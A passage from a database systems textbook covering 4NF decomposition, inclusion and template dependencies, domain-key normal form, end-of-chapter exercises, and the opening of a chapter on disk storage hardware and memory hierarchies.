chapter. (Consider only the tuples in Figure 5(c) of that chapter above the dashed
line for now.) In this case a tuple represents a supplier supplying a specific part to a
particular project, so there are no nontrivial MVDs. Hence, the SUPPLY all-key rela-
tion is already in 4NF and should not be decomposed.

5.3 Nonadditive Join Decomposition into 4NF Relations
Whenever we decompose a relation schema R into R1 = (X ∪ Y) and R2 = (R – Y)
based on an MVD X →→ Y that holds in R, the decomposition has the nonadditive
join property. It can be shown that this is a necessary and sufficient condition for
decomposing a schema into two schemas that have the nonadditive join property, as
given by Property NJB� that is a further generalization of Property NJB given earlier.
Property NJB dealt with FDs only, whereas NJB� deals with both FDs and MVDs
(recall that an FD is also an MVD).

Property NJB�. The relation schemas R1 and R2 form a nonadditive join
decomposition of R with respect to a set F of functional and multivalued
dependencies if and only if

(R1 ∩ R2) →→ (R1 – R2)
or, by symmetry, if and only if

(R1 ∩ R2) →→ (R2 – R1).

We can use a slight modification of Algorithm 5 to develop Algorithm 7, which cre-
ates a nonadditive join decomposition into relation schemas that are in 4NF (rather
than in BCNF). As with Algorithm 5, Algorithm 7 does not necessarily produce a
decomposition that preserves FDs.

Algorithm 7. Relational Decomposition into 4NF Relations with Nonadditive
Join Property

Input: A universal relation R and a set of functional and multivalued depend-
encies F.

1. Set D:= { R };

2. While there is a relation schema Q in D that is not in 4NF, do
{ choose a relation schema Q in D that is not in 4NF;

find a nontrivial MVD X →→ Y in Q that violates 4NF;
replace Q in D by two relation schemas (Q – Y) and (X ∪ Y);

};

Relational Database Design Algorithms and Further Dependencies

577

Relational Database Design Algorithms and Further Dependencies

6 Other Dependencies and Normal Forms
Another type of dependency is called join dependency (JD). It arises when a rela-
tion is decomposable into a set of projected relations that can be joined back to
yield the original relation. After defining JD, we define the fifth normal form based
on it. In the present section we will introduce some other types of dependencies.

6.1 Inclusion Dependencies
Inclusion dependencies were defined in order to formalize two types of interrela-
tional constraints:

■ The foreign key (or referential integrity) constraint cannot be specified as a
functional or multivalued dependency because it relates attributes across
relations.

■ The constraint between two relations that represent a class/subclass relation-
ship also has no formal definition in terms of the functional, multivalued,
and join dependencies.

Definition. An inclusion dependency R.X < S.Y between two sets of attrib- utes—X of relation schema R, and Y of relation schema S—specifies the con- straint that, at any specific time when r is a relation state of R and s a relation state of S, we must have πX(r(R)) ⊆ πY(s(S)) The ⊆ (subset) relationship does not necessarily have to be a proper subset. Obviously, the sets of attributes on which the inclusion dependency is specified—X of R and Y of S—must have the same number of attributes. In addition, the domains for each pair of corresponding attributes should be compatible. For exam- ple, if X = {A1, A2, ..., An} and Y = {B1, B2, ..., Bn}, one possible correspondence is to have dom(Ai) compatible with dom(Bi) for 1 ≤ i ≤ n. In this case, we say that Ai corresponds to Bi. For example, we can specify the following inclusion dependencies on the relational schema in Figure 1 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases”: DEPARTMENT.Dmgr_ssn < EMPLOYEE.Ssn WORKS_ON.Ssn < EMPLOYEE.Ssn EMPLOYEE.Dnumber < DEPARTMENT.Dnumber PROJECT.Dnum < DEPARTMENT.Dnumber WORKS_ON.Pnumber < PROJECT.Pnumber DEPT_LOCATIONS.Dnumber < DEPARTMENT.Dnumber All the preceding inclusion dependencies represent referential integrity constraints. We can also use inclusion dependencies to represent class/subclass 578 relationships. For example, in the relational schema of Figure A.1 (in Appendix: Figures of the end of this chapter), we can specify the following inclusion depend- encies: EMPLOYEE.Ssn < PERSON.Ssn ALUMNUS.Ssn < PERSON.Ssn STUDENT.Ssn < PERSON.Ssn As with other types of dependencies, there are inclusion dependency inference rules (IDIRs). The following are three examples: IDIR1 (reflexivity): R.X < R.X. IDIR2 (attribute correspondence): If R.X < S.Y, where X = {A1, A2, ..., An} and Y = {B1, B2, ..., Bn} and Ai corresponds to Bi, then R.Ai < S.Bi for 1 ≤ i ≤ n. IDIR3 (transitivity): If R.X < S.Y and S.Y < T.Z, then R.X < T.Z. The preceding inference rules were shown to be sound and complete for inclusion dependencies. So far, no normal forms have been developed based on inclusion dependencies. 6.2 Template Dependencies Template dependencies provide a technique for representing constraints in relations that typically have no easy and formal definitions. No matter how many types of dependencies we develop, some peculiar constraint may come up based on the semantics of attributes within relations that cannot be represented by any of them. The idea behind template dependencies is to specify a template—or example—that defines each constraint or dependency. There are two types of templates: tuple-generating templates and constraint- generating templates. A template consists of a number of hypothesis tuples that are meant to show an example of the tuples that may appear in one or more relations. The other part of the template is the template conclusion. For tuple-generating templates, the conclusion is a set of tuples that must also exist in the relations if the hypothesis tuples are there. For constraint-generating templates, the template con- clusion is a condition that must hold on the hypothesis tuples. Using constraint- generating templates, we are able to define semantic constraints—those that are beyond the scope of the relational model in terms of its data definition language and notation. Figure 5 shows how we may define functional, multivalued, and inclusion depend- encies by templates. Figure 6 shows how we may specify the constraint that an employee’s salary cannot be higher than the salary of his or her direct supervisor on the relation schema EMPLOYEE in Figure A.2. Relational Database Design Algorithms and Further Dependencies 579 (a) X = {A, B} Y = {C, D} Hypothesis Conclusion a1 b1 c1 c1 = c2 and d1 = d2 a1 b1 c2 (b) R = {A, B, C, D} R = {A, B, C, D} X = {A, B} Y = {C} X = {C, D} Y = {E, F} Hypothesis Conclusion (c) Hypothesis S = {E, F, G} Conclusion a1 b1 c1 d1 a1 b1 c1 d1 c1 d1 g a1 b1 c2 d2 a1 b1 c1 d1 a1 b1 c2 d2 R = {A, B, C, D} d1 d2 Figure 5 Templates for some common type of dependencies. (a) Template for functional dependency X → Y. (b) Template for the multivalued dependency X →→ Y. (c) Template for the inclusion dependency R.X < S.Y. EMPLOYEE = {Name, Ssn, . . . , Salary, Supervisor_ssn} Hypothesis Conclusion a b c d e f g c < f d Figure 6 Templates for the constraint that an employee’s salary must be less than the supervisor’s salary. Relational Database Design Algorithms and Further Dependencies 580 Relational Database Design Algorithms and Further Dependencies 6.3 Functional Dependencies Based on Arithmetic Functions and Procedures Sometimes some attributes in a relation may be related via some arithmetic func- tion or a more complicated functional relationship. As long as a unique value of Y is associated with every X, we can still consider that the FD X → Y exists. For example, in the relation ORDER_LINE (Order#, Item#, Quantity, Unit_price, Extended_price, Discounted_price) each tuple represents an item from an order with a particular quantity, and the price per unit for that item. In this relation, (Quantity, Unit_price ) → Extended_price by the formula Extended_price = Unit_price * Quantity. Hence, there is a unique value for Extended_price for every pair (Quantity, Unit_price ), and thus it conforms to the definition of functional dependency. Moreover, there may be a procedure that takes into account the quantity discounts, the type of item, and so on and computes a discounted price for the total quantity ordered for that item. Therefore, we can say (Item#, Quantity, Unit_price ) → Discounted_price, or (Item#, Quantity, Extended_price) → Discounted_price. To check the above FD, a more complex procedure COMPUTE_TOTAL_PRICE may have to be called into play. Although the above kinds of FDs are technically present in most relations, they are not given particular attention during normalization. 6.4 Domain-Key Normal Form There is no hard-and-fast rule about defining normal forms only up to 5NF. Historically, the process of normalization and the process of discovering undesir- able dependencies were carried through 5NF, but it has been possible to define stricter normal forms that take into account additional types of dependencies and constraints. The idea behind domain-key normal form (DKNF) is to specify (theo- retically, at least) the ultimate normal form that takes into account all possible types of dependencies and constraints. A relation schema is said to be in DKNF if all con- straints and dependencies that should hold on the valid relation states can be enforced simply by enforcing the domain constraints and key constraints on the relation. For a relation in DKNF, it becomes very straightforward to enforce all data- base constraints by simply checking that each attribute value in a tuple is of the appropriate domain and that every key constraint is enforced. However, because of the difficulty of including complex constraints in a DKNF rela- tion, its practical utility is limited, since it may be quite difficult to specify general integrity constraints. For example, consider a relation CAR(Make, Vin#) (where Vin# is the vehicle identification number) and another relation MANUFACTURE(Vin#, 581 Relational Database Design Algorithms and Further Dependencies Country) (where Country is the country of manufacture). A general constraint may be of the following form: If the Make is either ‘Toyota’ or ‘Lexus,’ then the first character of the Vin# is a ‘J’ if the country of manufacture is ‘Japan’; if the Make is ‘Honda’ or ‘Acura,’ the second character of the Vin# is a ‘J’ if the country of manufacture is ‘Japan.’ There is no simplified way to represent such constraints short of writing a proce- dure (or general assertions) to test them. The procedure COMPUTE_TOTAL_PRICE above is an example of such procedures needed to enforce an appropriate integrity constraint. 7 Summary In this chapter we presented a further set of topics related to dependencies, a discus- sion of decomposition, and several algorithms related to them as well as to normal- ization. In Section 1 we presented inference rules for functional dependencies (FDs), the notion of closure of an attribute, closure of a set of functional dependen- cies, equivalence among sets of functional dependencies, and algorithms for finding the closure of an attribute (Algorithm 1) and the minimal cover of a set of FDs (Algorithm 2). We then discussed two important properties of decompositions: the nonadditive join property and the dependency-preserving property. An algorithm to test for nonadditive decomposition (Algorithm 3), and a simpler test for check- ing the losslessness of binary decompositions (Property NJB) were described. We then discussed relational design by synthesis, based on a set of given functional dependencies. The relational synthesis algorithms (such as Algorithms 4 and 6) cre- ate 3NF relations from a universal relation schema based on a given set of functional dependencies that has been specified by the database designer. The relational decom- position algorithms (such as Algorithms 5 and 7) create BCNF (or 4NF) relations by successive nonadditive decomposition of unnormalized relations into two compo- nent relations at a time. We saw that it is possible to synthesize 3NF relation schemas that meet both of the above properties; however, in the case of BCNF, it is possible to aim only for the nonadditiveness of joins—dependency preservation cannot be necessarily guaranteed. If the designer has to aim for one of these two, the nonaddi- tive join condition is an absolute must. In Section 4 we showed how certain difficul- ties arise in a collection of relations due to null values that may exist in relations in spite of the relations being individually in 3NF or BCNF. Sometimes when decom- position is improperly carried too far, certain “dangling tuples” may result that do not participate in results of joins and hence may become invisible. We also showed how it is possible to have alternative designs that meet a given desired normal form. Then we revisited multivalued dependencies (MVDs) in Section 5, which arise from an improper combination of two or more independent multivalued attributes in the same relation, and that result in a combinational expansion of the tuples used to define fourth normal form (4NF). We discussed inference rules applicable to MVDs and discussed the importance of 4NF. Finally, in Section 6 we discussed inclusion dependencies, which are used to specify referential integrity and class/subclass con- straints, and template dependencies, which can be used to specify arbitrary types of 582 Relational Database Design Algorithms and Further Dependencies constraints. We pointed out the need for arithmetic functions or more complex procedures to enforce certain functional dependency constraints. We concluded with a brief discussion of the domain-key normal form (DKNF). Review Questions 1. What is the role of Armstrong’s inference rules (inference rules IR1 through IR3) in the development of the theory of relational design? 2. What is meant by the completeness and soundness of Armstrong’s inference rules? 3. What is meant by the closure of a set of functional dependencies? Illustrate with an example. 4. When are two sets of functional dependencies equivalent? How can we determine their equivalence? 5. What is a minimal set of functional dependencies? Does every set of depen- dencies have a minimal equivalent set? Is it always unique? 6. What is meant by the attribute preservation condition on a decomposition? 7. Why are normal forms alone insufficient as a condition for a good schema design? 8. What is the dependency preservation property for a decomposition? Why is it important? 9. Why can we not guarantee that BCNF relation schemas will be produced by dependency-preserving decompositions of non-BCNF relation schemas? Give a counterexample to illustrate this point. 10. What is the lossless (or nonadditive) join property of a decomposition? Why is it important? 11. Between the properties of dependency preservation and losslessness, which one must definitely be satisfied? Why? 12. Discuss the NULL value and dangling tuple problems. 13. Illustrate how the process of creating first normal form relations may lead to multivalued dependencies. How should the first normalization be done properly so that MVDs are avoided? 14. What types of constraints are inclusion dependencies meant to represent? 15. How do template dependencies differ from the other types of dependencies we discussed? 16. Why is the domain-key normal form (DKNF) known as the ultimate normal form? 583 Relational Database Design Algorithms and Further Dependencies Exercises 17. Show that the relation schemas produced by Algorithm 4 are in 3NF. 18. Show that, if the matrix S resulting from Algorithm 3 does not have a row that is all a symbols, projecting S on the decomposition and joining it back will always produce at least one spurious tuple. 19. Show that the relation schemas produced by Algorithm 5 are in BCNF. 20. Show that the relation schemas produced by Algorithm 6 are in 3NF. 21. Specify a template dependency for join dependencies. 22. Specify all the inclusion dependencies for the relational schema in Figure A.2. 23. Prove that a functional dependency satisfies the formal definition of multi- valued dependency. 24. Consider the example of normalizing the LOTS relation in Sections 4 and 5 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” Determine whether the decomposition of LOTS into {LOTS1AX, LOTS1AY, LOTS1B, LOTS2} has the lossless join property, by applying Algorithm 3 and also by using the test under Property NJB. 25. Show how the MVDs Ename →→ Pname and Ename →→ Dname in Figure 15(a) from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” may arise during normalization into 1NF of a relation, where the attributes Pname and Dname are multivalued. 26. Apply Algorithm 2(a) to the relation in Exercise 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” to determine a key for R. Create a minimal set of dependencies G that is equiv- alent to F, and apply the synthesis algorithm (Algorithm 6) to decompose R into 3NF relations. 27. Repeat Exercise 26 for the functional dependencies in Exercise 25 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” 28. Apply the decomposition algorithm (Algorithm 5) to the relation R and the set of dependencies F in Exercise 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” Repeat for the dependencies G in Exercise 25 from the same chapter. 29. Apply Algorithm 2(a) to the relations in Exercises 27 and 28 from the chap- ter “Basics of Functional Dependencies and Normalization for Relational Databases” to determine a key for R. Apply the synthesis algorithm (Algorithm 6) to decompose R into 3NF relations and the decomposition algorithm (Algorithm 5) to decompose R into BCNF relations. 30. Write programs that implement Algorithms 5 and 6. 31. Consider the following decompositions for the relation schema R of Exercise 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases.” Determine whether each decomposition has (1) the dependency preservation property, and (2) the lossless join property, with respect to F. Also determine which normal form each relation in the decomposition is in. 584 Relational Database Design Algorithms and Further Dependencies a. D1 = {R1, R2, R3, R4, R5} ; R1 = {A, B, C} , R2 = {A, D, E} , R3 = {B, F} , R4 = {F, G, H} , R5 = {D, I, J} b. D2 = {R1, R2, R3} ; R1 = {A, B, C, D, E} , R2 = {B, F, G, H} , R3 = {D, I, J} c. D3 = {R1, R2, R3, R4, R5} ; R1 = {A, B, C, D} , R2 = {D, E} , R3 = {B, F} , R4 = {F, G, H} , R5 = {D, I, J} 32. Consider the relation REFRIG(Model#, Year, Price, Manuf_plant, Color), which is abbreviated as REFRIG(M, Y, P, MP, C), and the following set F of func- tional dependencies: F = {M → MP, {M, Y} → P, MP → C} a. Evaluate each of the following as a candidate key for REFRIG, giving rea- sons why it can or cannot be a key: {M}, {M, Y}, {M, C}. b. Based on the above key determination, state whether the relation REFRIG is in 3NF and in BCNF, giving proper reasons. c. Consider the decomposition of REFRIG into D = {R1(M, Y, P), R2(M, MP, C)}. Is this decomposition lossless? Show why. (You may consult the test under Property NJB in Section 2.4.) Laboratory Exercises Note: These exercises use the DBD (Data Base Designer) system that is described in the laboratory manual. The relational schema R and set of functional dependencies F need to be coded as lists. As an example, R and F for problem 24 from the chapter “Basics of Functional Dependencies and Normalization for Relational Databases” are coded as: R = [a, b, c, d, e, f, g, h, i, j] F = [[[a, b],[c]], [[a],[d, e]], [[b],[f]], [[f],[g, h]], [[d],[i, j]]] Since DBD is implemented in Prolog, use of uppercase terms is reserved for vari- ables in the language and therefore lowercase constants are used to code the attrib- utes. For further details on using the DBD system, please refer to the laboratory manual. 33. Using the DBD system, verify your answers to the following exercises: a. 24 b. 26 c. 27 d. 28 e. 29 f. 31 (a) and (b) g. 32 (a) and (c) 585 Relational Database Design Algorithms and Further Dependencies Selected Bibliography The books by Maier (1983) and Atzeni and De Antonellis (1993) include a compre- hensive discussion of relational dependency theory. The decomposition algorithm (Algorithm 5) is due to Bernstein (1976). Algorithm 6 is based on the normalization algorithm presented in Biskup et al. (1979). Tsou and Fischer (1982) give a polyno- mial-time algorithm for BCNF decomposition. The theory of dependency preservation and lossless joins is given in Ullman (1988), where proofs of some of the algorithms discussed here appear. The lossless join property is analyzed in Aho et al. (1979). Algorithms to determine the keys of a rela- tion from functional dependencies are given in Osborn (1977); testing for BCNF is discussed in Osborn (1979). Testing for 3NF is discussed in Tsou and Fischer (1982). Algorithms for designing BCNF relations are given in Wang (1990) and Hernandez and Chan (1991). Multivalued dependencies and fourth normal form are defined in Zaniolo (1976) and Nicolas (1978). Many of the advanced normal forms are due to Fagin: the fourth normal form in Fagin (1977), PJNF in Fagin (1979), and DKNF in Fagin (1981). The set of sound and complete rules for functional and multivalued dependencies was given by Beeri et al. (1977). Join dependencies are discussed by Rissanen (1977) and Aho et al. (1979). Inference rules for join dependencies are given by Sciore (1982). Inclusion dependencies are discussed by Casanova et al. (1981) and analyzed further in Cosmadakis et al. (1990). Their use in optimizing relational schemas is discussed in Casanova et al. (1989). Template dependencies are discussed by Sadri and Ullman (1982). Other dependencies are discussed in Nicolas (1978), Furtado (1978), and Mendelzon and Maier (1979). Abiteboul et al. (1995) provides a theoretical treatment of many of the ideas presented in this chapter. 586 EMPLOYEE Salary Employee_type Position Rank Percent_time Ra_flag Ta_flag Project Course STUDENT Major_dept Grad_flag Undergrad_flag Degree_program Class Student_assist_flag Name Birth_date Sex Address PERSON Ssn ALUMNUS ALUMNUS_DEGREES Year MajorSsn Ssn Ssn Ssn Degree Figure A.1 Mapping an EER specialization lattice using multiple options. DEPARTMENT Fname Minit Lname Ssn Bdate Address Sex Salary Super_ssn Dno EMPLOYEE DEPT_LOCATIONS Dnumber Dlocation PROJECT Pname Pnumber Plocation Dnum WORKS_ON Essn Pno Hours DEPENDENT Essn Dependent_name Sex Bdate Relationship Dname Dnumber Mgr_ssn Mgr_start_date Figure A.2 Schema diagram for the COMPANY relational database schema. 587 Disk Storage, Basic File Structures, and Hashing Databases are stored physically as files of records,which are typically stored on magnetic disks. This chapter deals with the organization of databases in storage and the techniques for accessing them efficiently using various algorithms, some of which require auxiliary data structures called indexes. These structures are often referred to as physical database file structures, and are at the physical level of three-schema architecture. We start in Section 1 by introducing the concepts of computer storage hierarchies and how they are used in database systems. Section 2 is devoted to a description of magnetic disk storage devices and their characteristics, and we also briefly describe magnetic tape storage devices. After discussing different storage technologies, we turn our attention to the methods for physically organizing data on disks. Section 3 covers the technique of double buffering, which is used to speed retrieval of multi- ple disk blocks. In Section 4 we discuss various ways of formatting and storing file records on disk. Section 5 discusses the various types of operations that are typically applied to file records. We present three primary methods for organizing file records on disk: unordered records, in Section 6; ordered records, in Section 7; and hashed records, in Section 8. Section 9 briefly introduces files of mixed records and other primary methods for organizing records, such as B-trees. These are particularly relevant for storage of object-oriented databases. Section 10 describes RAID (Redundant Arrays of Inexpensive (or Independent) Disks)—a data storage system architecture that is commonly used in large organizations for better reliability and performance. Finally, in Section 11 we describe three developments in the storage systems area: storage area networks (SAN), network-attached storage (NAS), and iSCSI (Internet From Chapter 17 of Fundamentals of Database Systems, Sixth Edition. Ramez Elmasri and Shamkant B. Navathe. Copyright © 2011 by Pearson Education, Inc. Published by Addison- Wesley. All rights reserved. 588 Disk Storage, Basic File Structures, and Hashing SCSI—Small Computer System Interface), the latest technology, which makes stor- age area networks more affordable without the use of the Fiber Channel infrastruc- ture and hence is getting very wide acceptance in industry. Section 12 summarizes the chapter. This chapter may be browsed through or even omitted by readers who have already studied file organizations and indexing in a separate course. The material covered here, in particular Sections 1 through 8, is necessary for understanding query pro- cessing and optimization, and database tuning for improving performance of queries. 1 Introduction The collection of data that makes up a computerized database must be stored phys- ically on some computer storage medium. The DBMS software can then retrieve, update, and process this data as needed. Computer storage media form a storage hierarchy that includes two main categories: ■ Primary storage. This category includes storage media that can be operated on directly by the computer’s central processing unit (CPU), such as the com- puter’s main memory and smaller but faster cache memories. Primary stor- age usually provides fast access to data but is of limited storage capacity. Although main memory capacities have been growing rapidly in recent years, they are still more expensive and have less storage capacity than sec- ondary and tertiary storage devices. ■ Secondary and tertiary storage. This category includes magnetic disks, optical disks (CD-ROMs, DVDs, and other similar storage media), and tapes. Hard-disk drives are classified as secondary storage, whereas remov- able media such as optical disks and tapes are considered tertiary storage. These devices usually have a larger capacity, cost less, and provide slower access to data than do primary storage devices. Data in secondary or tertiary storage cannot be processed directly by the CPU; first it must be copied into primary storage and then processed by the CPU. We first give an overview of the various storage devices used for primary and sec- ondary storage in Section 1.1 and then discuss how databases are typically handled in the storage hierarchy in Section 1.2. 1.1 Memory Hierarchies and Storage Devices In a modern computer system, data resides and is transported throughout a hierar- chy of storage media. The highest-speed memory is the most expensive and is there- fore available with the least capacity. The lowest-speed memory is offline tape storage, which is essentially available in indefinite storage capacity. 589 Disk Storage, Basic File Structures, and Hashing At the primary storage level, the memory hierarchy includes at the most expensive end, cache memory, which is a static RAM (Random Access Memory). Cache mem- ory is typically used by the CPU to speed up execution of program instructions using techniques such as prefetching and pipelining. The next level of primary stor- age is DRAM (Dynamic RAM), which provides the main work area for the CPU for keeping program instructions and data. It is popularly called main memory. The advantage of DRAM is its low cost, which continues to decrease; the drawback is its volatility1 and lower speed compared with static RAM. At the secondary and tertiary storage level, the hierarchy includes magnetic disks, as well as mass storage in the form of CD-ROM (Compact Disk–Read-Only Memory) and DVD (Digital Video Disk or Digital Versatile Disk) devices, and finally tapes at the least expensive end of the hierarchy. The storage capacity is measured in kilobytes (Kbyte or 1000 bytes), megabytes (MB or 1 million bytes), gigabytes (GB or 1 billion bytes), and even ter- abytes (1000 GB). The word petabyte (1000 terabytes or 10**15 bytes) is now becoming relevant in the context of very large repositories of data in physics, astronomy, earth sciences, and other scientific applications. Programs reside and execute in DRAM. Generally, large permanent databases reside on secondary storage, (magnetic disks), and portions of the database are read into and written from buffers in main memory as needed. Nowadays, personal comput- ers and workstations have large main memories of hundreds of megabytes of RAM and DRAM, so it is becoming possible to load a large part of the database into main memory. Eight to 16 GB of main memory on a single server is becoming common- place. In some cases, entire databases can be kept in main memory (with a backup copy on magnetic disk), leading to main memory databases; these are particularly useful in real-time applications that require extremely fast response times. An example is telephone switching applications, which store databases that contain routing and line information in main memory. Between DRAM and magnetic disk storage, another form of memory, flash mem- ory, is becoming common, particularly because it is nonvolatile. Flash memories are high-density, high-performance memories using EEPROM (Electrically Erasable Programmable Read-Only Memory) technology. The advantage of flash memory is the fast access speed; the disadvantage is that an entire block must be erased and written over simultaneously. Flash memory cards are appearing as the data storage medium in appliances with capacities ranging from a few megabytes to a few giga- bytes. These are appearing in cameras, MP3 players, cell phones, PDAs, and so on. USB (Universal Serial Bus) flash drives have become the most portable medium for carrying data between personal computers; they have a flash memory storage device integrated with a USB interface. CD-ROM (Compact Disk – Read Only Memory) disks store data optically and are read by a laser. CD-ROMs contain prerecorded data that cannot be overwritten. WORM (Write-Once-Read-Many) disks are a form of optical storage used for 1Volatile memory typically loses its contents in case of a power outage, whereas nonvolatile memory does not. 590 Disk Storage, Basic File Structures, and Hashing archiving data; they allow data to be written once and read any number of times without the possibility of erasing. They hold about half a gigabyte of data per disk and last much longer than magnetic disks.2 Optical jukebox memories use an array of CD-ROM platters, which are loaded onto drives on demand. Although optical jukeboxes have capacities in the hundreds of gigabytes, their retrieval times are in the hundreds of milliseconds, quite a bit slower than magnetic disks. This type of storage is continuing to decline because of the rapid decrease in cost and increase in capacities of magnetic disks. The DVD is another standard for optical disks allowing 4.5 to 15 GB of storage per disk. Most personal computer disk drives now read CD- ROM and DVD disks. Typically, drives are CD-R (Compact Disk Recordable) that can create CD-ROMs and audio CDs (Compact Disks), as well as record on DVDs. Finally, magnetic tapes are used for archiving and backup storage of data. Tape jukeboxes—which contain a bank of tapes that are catalogued and can be automat- ically loaded onto tape drives—are becoming popular as tertiary storage to hold terabytes of data. For example, NASA’s EOS (Earth Observation Satellite) system stores archived databases in this fashion. Many large organizations are already finding it normal to have terabyte-sized data- bases. The term very large database can no longer be precisely defined because disk storage capacities are on the rise and costs are declining. Very soon the term may be reserved for databases containing tens of terabytes. 1.2 Storage of Databases Databases typically store large amounts of data that must persist over long periods of time, and hence is often referred to as persistent data. Parts of this data are accessed and processed repeatedly during this period. This contrasts with the notion of transient data that persist for only a limited time during program execution. Most databases are stored permanently (or persistently) on magnetic disk secondary storage, for the following reasons: ■ Generally, databases are too large to fit entirely in main memory. ■ The circumstances that cause permanent loss of stored data arise less fre- quently for disk secondary storage than for primary storage. Hence, we refer to disk—and other secondary storage devices—as nonvolatile storage, whereas main memory is often called volatile storage. ■ The cost of storage per unit of data is an order of magnitude less for disk sec- ondary storage than for primary storage. Some of the newer technologies—such as optical disks, DVDs, and tape juke- boxes—are likely to provide viable alternatives to the use of magnetic disks. In the future, databases may therefore reside at different levels of the memory hierarchy from those described in Section 1.1. However, it is anticipated that magnetic disks 2Their rotational speeds are lower (around 400 rpm), giving higher latency delays and low transfer rates (around 100 to 200 KB/second). 591 Disk Storage, Basic File Structures, and Hashing will continue to be the primary medium of choice for large databases for years to come. Hence, it is important to study and understand the properties and character- istics of magnetic disks and the way data files can be organized on disk in order to design effective databases with acceptable performance. Magnetic tapes are frequently used as a storage medium for backing up databases because storage on tape costs even less than storage on disk. However, access to data on tape is quite slow. Data stored on tapes is offline; that is, some intervention by an operator—or an automatic loading device—to load a tape is needed before the data becomes available. In contrast, disks are online devices that can be accessed directly at any time. The techniques used to store large amounts of structured data on disk are impor- tant for database designers, the DBA, and implementers of a DBMS. Database designers and the DBA must know the advantages and disadvantages of each stor- age technique when they design, implement, and operate a database on a specific DBMS. Usually, the DBMS has several options available for organizing the data. The process of physical database design involves choosing the particular data organiza- tion techniques that best suit the given application requirements from among the options. DBMS system implementers must study data organization techniques so that they can implement them efficiently and thus provide the DBA and users of the DBMS with sufficient options. Typical database applications need only a small portion of the database at a time for processing. Whenever a certain portion of the data is needed, it must be located on disk, copied to main memory for processing, and then rewritten to the disk if the data is changed. The data stored on disk is organized as files of records. Each record is a collection of data values that can be interpreted as facts about entities, their attributes, and their relationships. Records should be stored on disk in a manner that makes it possible to locate them efficiently when they are needed. There are several primary file organizations, which determine how the file records are physically placed on the disk, and hence how the records can be accessed. A heap file (or unordered file) places the records on disk in no particular order by appending new records at the end of the file, whereas a sorted file (or sequential file) keeps the records ordered by the value of a particular field (called the sort key). A hashed file uses a hash function applied to a particular field (called the hash key) to determine a record’s placement on disk. Other primary file organizations, such as B-trees, use tree structures. We discuss primary file organizations in Sections 6 through 9. A secondary organization or auxiliary access structure allows efficient access to file records based on alternate fields than those that have been used for the primary file organization. Most of these exist as indexes. 2 Secondary Storage Devices In this section we describe some characteristics of magnetic disk and magnetic tape storage devices. Readers who have already studied these devices may simply browse through this section. 592 Disk Storage, Basic File Structures, and Hashing Actuator movement Track ArmActuator Read/write head Spindle Disk rotation Cylinder of tracks (imaginary) (a) (b) Figure 1 (a) A single-sided disk with read/write hardware. (b) A disk pack with read/write hardware. 2.1 Hardware Description of Disk Devices Magnetic disks are used for storing large amounts of data. The most basic unit of data on the disk is a single bit of information. By magnetizing an area on disk in cer- tain ways, one can make it represent a bit value of either 0 (zero) or 1 (one). To code information, bits are grouped into bytes (or characters). Byte sizes are typically 4 to 8 bits, depending on the computer and the device. We assume that one character is stored in a single byte, and we use the terms byte and character interchangeably. The capacity of a disk is the number of bytes it can store, which is usually very large. Small floppy disks used with microcomputers typically hold from 400 KB to 1.5 MB; they are rapidly going out of circulation. Hard disks for personal computers typically hold from several hundred MB up to tens of GB; and large disk packs used with servers and mainframes have capacities of hundreds of GB. Disk capacities continue to grow as technology improves. Whatever their capacity, all disks are made of magnetic material shaped as a thin circular disk, as shown in Figure 1(a), and protected by a plastic or acrylic cover. A 593 Disk Storage, Basic File Structures, and Hashing Track(a) Sector (arc of track) (b) Three sectors Two sectors One sector Figure 2 Different sector organ- izations on disk. (a) Sectors subtending a fixed angle. (b) Sectors maintaining a uniform recording density. disk is single-sided if it stores information on one of its surfaces only and double- sided if both surfaces are used. To increase storage capacity, disks are assembled into a disk pack, as shown in Figure 1(b), which may include many disks and therefore many surfaces. Information is stored on a disk surface in concentric circles of small width,3 each having a distinct diameter. Each circle is called a track. In disk packs, tracks with the same diameter on the various surfaces are called a cylinder because of the shape they would form if connected in space. The concept of a cylinder is important because data stored on one cylinder can be retrieved much faster than if it were distributed among different cylinders. The number of tracks on a disk ranges from a few hundred to a few thousand, and the capacity of each track typically ranges from tens of Kbytes to 150 Kbytes. Because a track usually contains a large amount of information, it is divided into smaller blocks or sectors. The division of a track into sectors is hard-coded on the disk surface and cannot be changed. One type of sector organization, as shown in Figure 2(a), calls a portion of a track that subtends a fixed angle at the center a sec- tor. Several other sector organizations are possible, one of which is to have the sec- tors subtend smaller angles at the center as one moves away, thus maintaining a uniform density of recording, as shown in Figure 2(b). A technique called ZBR (Zone Bit Recording) allows a range of cylinders to have the same number of sectors per arc. For example, cylinders 0–99 may have one sector per track, 100–199 may have two per track, and so on. Not all disks have their tracks divided into sectors. The division of a track into equal-sized disk blocks (or pages) is set by the operat- ing system during disk formatting (or initialization). Block size is fixed during ini- tialization and cannot be changed dynamically. Typical disk block sizes range from 512 to 8192 bytes. A disk with hard-coded sectors often has the sectors subdivided into blocks during initialization. Blocks are separated by fixed-size interblock gaps, which include specially coded control information written during disk initializa- tion. This information is used to determine which block on the track follows each 3In some disks, the circles are now connected into a kind of continuous spiral. 594 Disk Storage, Basic File Structures, and Hashing Table 1 Specifications of Typical High-End Cheetah Disks from Seagate Description Cheetah 15K.6 Cheetah NS 10K Model Number ST3450856SS/FC ST3400755FC Height 25.4 mm 26.11 mm Width 101.6 mm 101.85 mm Length 146.05 mm 147 mm Weight 0.709 kg 0.771 kg Capacity Formatted Capacity 450 Gbytes 400 Gbytes Configuration Number of disks (physical) 4 4 Number of heads (physical) 8 8 Performance Transfer Rates Internal Transfer Rate (min) 1051 Mb/sec Internal Transfer Rate (max) 2225 Mb/sec 1211 Mb/sec Mean Time Between Failure (MTBF) 1.4 M hours Seek Times Avg. Seek Time (Read) 3.4 ms (typical) 3.9 ms (typical) Avg. Seek Time (Write) 3.9 ms (typical) 4.2 ms (typical) Track-to-track, Seek, Read 0.2 ms (typical) 0.35 ms (typical) Track-to-track, Seek, Write 0.4 ms (typical) 0.35 ms (typical) Average Latency 2 ms 2.98 msec Courtesy Seagate Technology interblock gap. Table 1 illustrates the specifications of typical disks used on large servers in industry. The 10K and 15K prefixes on disk names refer to the rotational speeds in rpm (revolutions per minute). There is continuous improvement in the storage capacity and 